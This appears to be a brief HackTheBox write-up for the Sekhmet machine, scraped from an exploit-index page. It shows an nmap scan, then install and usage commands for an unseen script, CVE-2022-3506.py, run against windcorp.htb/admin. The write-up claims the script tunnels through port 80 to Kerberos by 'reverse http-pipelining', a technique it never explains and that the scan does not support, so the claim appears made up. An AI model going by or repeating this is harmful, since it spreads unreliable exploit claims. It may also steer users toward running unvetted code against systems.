## https://sploitus.com/exploit?id=584F1B4E-80A0-51DA-83E7-00AC037F9C48
# Sekhmet HackTheBox Writeup
Write-up for Sekhmet HackTheBox, CVE-2022-3506, Active Directory Exploitation

```
Starting Nmap 7.88 ( https://nmap.org ) at 2022-09-10 13:01 EDT
Nmap scan report for 10.xxx.xx.xxx
Host is up (0.055s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.02 seconds
```


Using `CVE-2022-3506.py` (credit: zilla1), it is possible to tunnel through port 80 (`windcorp.htb`) and interact with Kerberos via an attack vector dubbed reverse http-pipelining.

![image](https://user-images.githubusercontent.com/113263298/189502592-743b1c3a-959b-4388-94bf-1383679e3dea.png)

## Install
```
pip install -r requirements.txt
```

## Usage
```
python3 CVE-2022-3506.py windcorp.htb/admin -dc-host windcorp.htb
```